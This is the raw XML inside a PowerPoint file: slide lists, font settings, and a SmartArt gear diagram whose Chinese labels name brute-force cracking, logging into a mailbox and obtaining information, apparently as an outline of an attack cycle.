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5.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag6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30.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag64.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide31.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag6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0"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="425" r:id="rId3"/>
    <p:sldId id="458" r:id="rId4"/>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="426" r:id="rId7"/>
    <p:sldId id="427" r:id="rId8"/>
    <p:sldId id="428" r:id="rId9"/>
    <p:sldId id="429" r:id="rId10"/>
    <p:sldId id="430" r:id="rId11"/>
    <p:sldId id="431" r:id="rId12"/>
    <p:sldId id="432" r:id="rId13"/>
    <p:sldId id="433" r:id="rId14"/>
    <p:sldId id="434" r:id="rId15"/>
    <p:sldId id="435" r:id="rId16"/>
    <p:sldId id="437" r:id="rId17"/>
    <p:sldId id="438" r:id="rId18"/>
    <p:sldId id="439" r:id="rId19"/>
    <p:sldId id="440" r:id="rId20"/>
    <p:sldId id="441" r:id="rId21"/>
    <p:sldId id="442" r:id="rId22"/>
    <p:sldId id="443" r:id="rId23"/>
    <p:sldId id="444" r:id="rId24"/>
    <p:sldId id="445" r:id="rId25"/>
    <p:sldId id="446" r:id="rId26"/>
    <p:sldId id="447" r:id="rId27"/>
    <p:sldId id="448" r:id="rId28"/>
    <p:sldId id="449" r:id="rId29"/>
    <p:sldId id="450" r:id="rId30"/>
    <p:sldId id="451" r:id="rId31"/>
    <p:sldId id="452" r:id="rId32"/>
    <p:sldId id="453" r:id="rId33"/>
    <p:sldId id="454" r:id="rId34"/>
    <p:sldId id="455" r:id="rId35"/>
    <p:sldId id="456" r:id="rId36"/>
    <p:sldId id="457" r:id="rId37"/>
    <p:sldId id="459" r:id="rId38"/>
    <p:sldId id="424" r:id="rId39"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="华光小标宋_CNKI" panose="02010600030101010101" charset="-122"/>
      <p:regular r:id="rId41"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
      <p:regular r:id="rId42"/>
      <p:bold r:id="rId43"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="等线 Light" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
      <p:regular r:id="rId44"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
      <p:regular r:id="rId45"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
      <p:regular r:id="rId46"/>
      <p:bold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F68"/>
    <a:srgbClr val="5391D9"/>
    <a:srgbClr val="141C5D"/>
    <a:srgbClr val="1B236C"/>
    <a:srgbClr val="12347B"/>
    <a:srgbClr val="00316B"/>
    <a:srgbClr val="2C57A9"/>
    <a:srgbClr val="1F2670"/>
    <a:srgbClr val="CC66FF"/>
    <a:srgbClr val="1211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1" autoAdjust="0"/>
    <p:restoredTop sz="88413" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="84" d="100"/>
          <a:sy n="84" d="100"/>
        </p:scale>
        <p:origin x="403"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3#2">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CAC802E-7D66-4FA5-BAA0-59F0AD2C3FD1}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/gear1#2" loCatId="cycle" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple2#2" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_3#2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{82157769-FA30-4FC0-B527-F19CF19583B8}">
      <dgm:prSet phldrT="[文本]" phldr="0" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr vert="horz" wrap="square"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"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暴力</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"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破解</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F97B3A16-6B40-407A-94DD-D0A94D209444}" type="parTrans" cxnId="{D8273064-7321-4481-84AD-8C9C956FD440}">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5C5B8929-AD1B-40F9-B0CA-DFF3956BCFA4}" type="sibTrans" cxnId="{D8273064-7321-4481-84AD-8C9C956FD440}">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F1141A63-9253-4743-9491-451D34B0CF7D}">
      <dgm:prSet phldrT="[文本]" phldr="0" custT="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr vert="horz" wrap="square"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" b="1"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登录</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" b="1"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邮箱</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA391DFC-CB33-40A1-A752-C665AB4D36D7}" type="parTrans" cxnId="{64AA9583-6F92-474B-981C-4A219D74BBC1}">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3E45E9DD-D063-4A1D-8C93-0D860F1C9446}" type="sibTrans" cxnId="{64AA9583-6F92-474B-981C-4A219D74BBC1}">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671512AD-8D9C-411B-97F4-A17909131C6C}">
      <dgm:prSet phldrT="[文本]" phldr="0" custT="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr vert="horz" wrap="square"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" b="1"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获取</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" b="1"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信息</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{91FF9BF9-2391-43E6-BEA5-292026516317}" type="parTrans" cxnId="{9F6E31B4-E2B7-47CE-953D-4AEB34B5F5CC}">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A85E1A8A-7879-4E86-A04B-71A9351C60EC}" type="sibTrans" cxnId="{9F6E31B4-E2B7-47CE-953D-4AEB34B5F5CC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:effectLst>
              <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                <a:srgbClr val="000000">
                  <a:alpha val="43137"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{79C67644-734E-4F92-B317-D960DCB26B39}" type="pres">
      <dgm:prSet presAssocID="{CCAC802E-7D66-4FA5-BAA0-59F0AD2C3FD1}" presName="composite" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="3"/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6368D820-5AD8-4F2A-B4DE-28FC7FDF0DB0}" type="pres">
      <dgm:prSet presAssocID="{82157769-FA30-4FC0-B527-F19CF19583B8}" presName="gear1" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BA71DA7B-4ADC-45FD-94AE-2AF38C05DBBD}" type="pres">
      <dgm:prSet presAssocID="{82157769-FA30-4FC0-B527-F19CF19583B8}" presName="gear1srcNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5092BCAC-A2CB-44BD-9220-7CF9BEBB4B85}" type="pres">
      <dgm:prSet presAssocID="{82157769-FA30-4FC0-B527-F19CF19583B8}" presName="gear1dstNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F0166E2C-B433-48D7-90C8-02B35E28474A}" type="pres">
      <dgm:prSet presAssocID="{F1141A63-9253-4743-9491-451D34B0CF7D}" presName="gear2" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F0082462-8013-4A1B-AB09-EC713C62459C}" type="pres">
      <dgm:prSet presAssocID="{F1141A63-9253-4743-9491-451D34B0CF7D}" presName="gear2srcNode" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{83363E6B-ABBE-45A8-9EAC-8637A57C8DCF}" type="pres">
      <dgm:prSet presAssocID="{F1141A63-9253-4743-9491-451D34B0CF7D}" presName="gear2dstNode" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FDCDF4E3-E341-4243-A61A-ABF4F7FFF44A}" type="pres">
      <dgm:prSet presAssocID="{671512AD-8D9C-411B-97F4-A17909131C6C}" presName="gear3" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6E3EE91E-C4EF-43CA-A031-0E5ECB0A3E96}" type="pres">
      <dgm:prSet presAssocID="{671512AD-8D9C-411B-97F4-A17909131C6C}" presName="gear3tx" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{88F1857E-6AC7-41FA-9AC8-F5C86487EB98}" type="pres">
      <dgm:prSet presAssocID="{671512AD-8D9C-411B-97F4-A17909131C6C}" presName="gear3srcNode" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{39D17B09-BB7C-4911-80FE-58F5BA143928}" type="pres">
      <dgm:prSet presAssocID="{671512AD-8D9C-411B-97F4-A17909131C6C}" presName="gear3dstNode" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C1BE1843-8220-4F59-A573-1DE4279AB09C}" type="pres">
      <dgm:prSet presAssocID="{5C5B8929-AD1B-40F9-B0CA-DFF3956BCFA4}" presName="connector1" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{14D33AD9-02A7-4925-87F6-7BE2B7DC7EBD}" type="pres">
      <dgm:prSet presAssocID="{3E45E9DD-D063-4A1D-8C93-0D860F1C9446}" presName="connector2" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3FED63FC-B29E-41B4-90BF-69AB67019CB1}" type="pres">
      <dgm:prSet presAssocID="{A85E1A8A-7879-4E86-A04B-71A9351C60EC}" presName="connector3" presStyleLbl="sibTrans2D1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{C6AB330D-E6DF-4EEA-92BD-FE5A023A46A7}" type="presOf" srcId="{F1141A63-9253-4743-9491-451D34B0CF7D}" destId="{83363E6B-ABBE-45A8-9EAC-8637A57C8DCF}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1#2"/>
    <dgm:cxn modelId="{0EA73012-197A-4489-A9F7-ABDCEF88F252}" type="presOf" srcId="{3E45E9DD-D063-4A1D-8C93-0D860F1C9446}" destId="{14D33AD9-02A7-4925-87F6-7BE2B7DC7EBD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1#2"/>
    <dgm:cxn modelId="{1698D718-51CA-42FF-9B02-653E75B542ED}" type="presOf" srcId="{82157769-FA30-4FC0-B527-F19CF19583B8}" destId="{BA71DA7B-4ADC-45FD-94AE-2AF38C05DBBD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1#2"/>
    <dgm:cxn modelId="{FD148020-4C1E-4B9D-9A3D-F794599098AF}" type="presOf" srcId="{671512AD-8D9C-411B-97F4-A17909131C6C}" destId="{6E3EE91E-C4EF-43CA-A031-0E5ECB0A3E96}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1#2"/>
    <dgm:cxn modelId="{2D695D24-7F97-45B5-A37A-CA066CF0E650}" type="presOf" srcId="{5C5B8929-AD1B-40F9-B0CA-DFF3956BCFA4}" destId="{C1BE1843-8220-4F59-A573-1DE4279AB09C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1#2"/>
    <dgm:cxn modelId="{305B313F-88CF-4469-B195-26A799CA8EFB}" type="presOf" srcId="{CCAC802E-7D66-4FA5-BAA0-59F0AD2C3FD1}" destId="{79C67644-734E-4F92-B317-D960DCB26B39}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1#2"/>
    <dgm:cxn modelId="{D8273064-7321-4481-84AD-8C9C956FD440}" srcId="{CCAC802E-7D66-4FA5-BAA0-59F0AD2C3FD1}" destId="{82157769-FA30-4FC0-B527-F19CF19583B8}" srcOrd="0" destOrd="0" parTransId="{F97B3A16-6B40-407A-94DD-D0A94D209444}" sibTransId="{5C5B8929-AD1B-40F9-B0CA-DFF3956BCFA4}"/>
    <dgm:cxn modelId="{48B4FF44-E25D-4F3E-972F-3E303C8EB02C}" type="presOf" srcId="{671512AD-8D9C-411B-97F4-A17909131C6C}" destId="{39D17B09-BB7C-4911-80FE-58F5BA143928}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1#2"/>
    <dgm:cxn modelId="{5881537D-3876-4308-86EE-9F2D72079186}" type="presOf" srcId="{F1141A63-9253-4743-9491-451D34B0CF7D}" destId="{F0166E2C-B433-48D7-90C8-02B35E28474A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1#2"/>
    <dgm:cxn modelId="{B3160E7F-960B-4794-A42E-5F3E3B4476A9}" type="presOf" srcId="{671512AD-8D9C-411B-97F4-A17909131C6C}" destId="{FDCDF4E3-E341-4243-A61A-ABF4F7FFF44A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1#2"/>
    <dgm:cxn modelId="{64AA9583-6F92-474B-981C-4A219D74BBC1}" srcId="{CCAC802E-7D66-4FA5-BAA0-59F0AD2C3FD1}" destId="{F1141A63-9253-4743-9491-451D34B0CF7D}" srcOrd="1" destOrd="0" parTransId="{AA391DFC-CB33-40A1-A752-C665AB4D36D7}" sibTransId="{3E45E9DD-D063-4A1D-8C93-0D860F1C9446}"/>
    <dgm:cxn modelId="{ADBE799D-5C03-45D9-ABA1-38A91CCFE11F}" type="presOf" srcId="{671512AD-8D9C-411B-97F4-A17909131C6C}" destId="{88F1857E-6AC7-41FA-9AC8-F5C86487EB98}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1#2"/>
    <dgm:cxn modelId="{D28038AC-6FB7-4238-980B-E679E8F0E795}" type="presOf" srcId="{F1141A63-9253-4743-9491-451D34B0CF7D}" destId="{F0082462-8013-4A1B-AB09-EC713C62459C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1#2"/>
    <dgm:cxn modelId="{9F6E31B4-E2B7-47CE-953D-4AEB34B5F5CC}" srcId="{CCAC802E-7D66-4FA5-BAA0-59F0AD2C3FD1}" destId="{671512AD-8D9C-411B-97F4-A17909131C6C}" srcOrd="2" destOrd="0" parTransId="{91FF9BF9-2391-43E6-BEA5-292026516317}" sibTransId="{A85E1A8A-7879-4E86-A04B-71A9351C60EC}"/>
    <dgm:cxn modelId="{43EB97E0-4086-458B-820C-3F22DD738496}" type="presOf" srcId="{82157769-FA30-4FC0-B527-F19CF19583B8}" destId="{6368D820-5AD8-4F2A-B4DE-28FC7FDF0DB0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1#2"/>
    <dgm:cxn modelId="{8CB314F0-EDE9-49F7-9A34-135F27CD73BF}" type="presOf" srcId="{82157769-FA30-4FC0-B527-F19CF19583B8}" destId="{5092BCAC-A2CB-44BD-9220-7CF9BEBB4B85}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1#2"/>
    <dgm:cxn modelId="{B0A343FB-43CE-4DA5-941E-C9234F8CEFC3}" type="presOf" srcId="{A85E1A8A-7879-4E86-A04B-71A9351C60EC}" destId="{3FED63FC-B29E-41B4-90BF-69AB67019CB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1#2"/>
    <dgm:cxn modelId="{0FC729A5-93AC-4ECC-9049-99CCE383D473}" type="presParOf" srcId="{79C67644-734E-4F92-B317-D960DCB26B39}" destId="{6368D820-5AD8-4F2A-B4DE-28FC7FDF0DB0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1#2"/>
    <dgm:cxn modelId="{7CAD3952-31D9-4857-ADF3-9E7037D6DD23}" type="presParOf" srcId="{79C67644-734E-4F92-B317-D960DCB26B39}" destId="{BA71DA7B-4ADC-45FD-94AE-2AF38C05DBBD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1#2"/>
    <dgm:cxn modelId="{12789DC5-A28D-4397-9C55-75B40FB0B179}" type="presParOf" srcId="{79C67644-734E-4F92-B317-D960DCB26B39}" destId="{5092BCAC-A2CB-44BD-9220-7CF9BEBB4B85}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1#2"/>
    <dgm:cxn modelId="{34C42FDB-8B6B-49AA-B961-CFCFF943908D}" type="presParOf" srcId="{79C67644-734E-4F92-B317-D960DCB26B39}" destId="{F0166E2C-B433-48D7-90C8-02B35E28474A}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1#2"/>
    <dgm:cxn modelId="{F503BBC8-9E6B-48DE-84E0-F6E23DD4557D}" type="presParOf" srcId="{79C67644-734E-4F92-B317-D960DCB26B39}" destId="{F0082462-8013-4A1B-AB09-EC713C62459C}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1#2"/>
    <dgm:cxn modelId="{2091B96E-D9AF-4EE1-A224-36C56CF43C1C}" type="presParOf" srcId="{79C67644-734E-4F92-B317-D960DCB26B39}" destId="{83363E6B-ABBE-45A8-9EAC-8637A57C8DCF}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1#2"/>
    <dgm:cxn modelId="{7D3F0747-2E52-4764-A699-84E6D300ACA8}" type="presParOf" srcId="{79C67644-734E-4F92-B317-D960DCB26B39}" destId="{FDCDF4E3-E341-4243-A61A-ABF4F7FFF44A}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1#2"/>
    <dgm:cxn modelId="{8B0A7FB2-AFC4-47E5-A5B1-84BCB03152A4}" type="presParOf" srcId="{79C67644-734E-4F92-B317-D960DCB26B39}" destId="{6E3EE91E-C4EF-43CA-A031-0E5ECB0A3E96}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1#2"/>
    <dgm:cxn modelId="{C5304632-DFB3-42AA-B8E1-B6AB7D9FC37B}" type="presParOf" srcId="{79C67644-734E-4F92-B317-D960DCB26B39}" destId="{88F1857E-6AC7-41FA-9AC8-F5C86487EB98}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1#2"/>
    <dgm:cxn modelId="{31CD00F1-4E6C-4A54-86E0-034C483733EA}" type="presParOf" srcId="{79C67644-734E-4F92-B317-D960DCB26B39}" destId="{39D17B09-BB7C-4911-80FE-58F5BA143928}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1#2"/>
    <dgm:cxn modelId="{2D6BECCB-D51C-468A-8E8A-B930C96D2AAD}" type="presParOf" srcId="{79C67644-734E-4F92-B317-D960DCB26B39}" destId="{C1BE1843-8220-4F59-A573-1DE4279AB09C}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1#2"/>
    <dgm:cxn modelId="{47B5E030-8E53-4F2C-B845-D408E06EE443}" type="presParOf" srcId="{79C67644-734E-4F92-B317-D960DCB26B39}" destId="{14D33AD9-02A7-4925-87F6-7BE2B7DC7EBD}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1#2"/>
    <dgm:cxn modelId="{82901E1E-99AB-4577-873C-78B7935A84C2}" type="presParOf" srcId="{79C67644-734E-4F92-B317-D960DCB26B39}" destId="{3FED63FC-B29E-41B4-90BF-69AB67019CB1}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/gear1#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8D820-5AD8-4F2A-B4DE-28FC7FDF0DB0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1942470" y="1900858"/>
          <a:ext cx="2323272" cy="2323272"/>
        </a:xfrm>
        <a:prstGeom prst="gear9">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100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" kern="1200"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暴力</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="1244600">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" kern="1200"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破解</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2409551" y="2445073"/>
        <a:ext cx="1389110" cy="1194210"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F0166E2C-B433-48D7-90C8-02B35E28474A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="590748" y="1351721"/>
          <a:ext cx="1689652" cy="1689652"/>
        </a:xfrm>
        <a:prstGeom prst="gear6">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent1">
            <a:shade val="80000"/>
            <a:hueOff val="174641"/>
            <a:satOff val="-3128"/>
            <a:lumOff val="1329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00000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1700" b="1" kern="1200"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登录</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="755650">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1700" b="1" kern="1200"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邮箱</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1016123" y="1779667"/>
        <a:ext cx="838902" cy="833760"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FDCDF4E3-E341-4243-A61A-ABF4F7FFF44A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="20700000">
          <a:off x="1537126" y="186034"/>
          <a:ext cx="1655514" cy="1655514"/>
        </a:xfrm>
        <a:prstGeom prst="gear6">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent1">
            <a:shade val="80000"/>
            <a:hueOff val="349283"/>
            <a:satOff val="-6256"/>
            <a:lumOff val="2658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100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1700" b="1" kern="1200"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获取</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="755650">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1700" b="1" kern="1200" dirty="0">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信息</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-20700000">
        <a:off x="1900229" y="549137"/>
        <a:ext cx="929308" cy="929308"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C1BE1843-8220-4F59-A573-1DE4279AB09C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1764153" y="1550096"/>
          <a:ext cx="2973788" cy="2973788"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 4688"/>
            <a:gd name="adj2" fmla="val 299029"/>
            <a:gd name="adj3" fmla="val 2516946"/>
            <a:gd name="adj4" fmla="val 15859598"/>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14D33AD9-02A7-4925-87F6-7BE2B7DC7EBD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="291514" y="977737"/>
          <a:ext cx="2160643" cy="2160643"/>
        </a:xfrm>
        <a:prstGeom prst="leftCircularArrow">
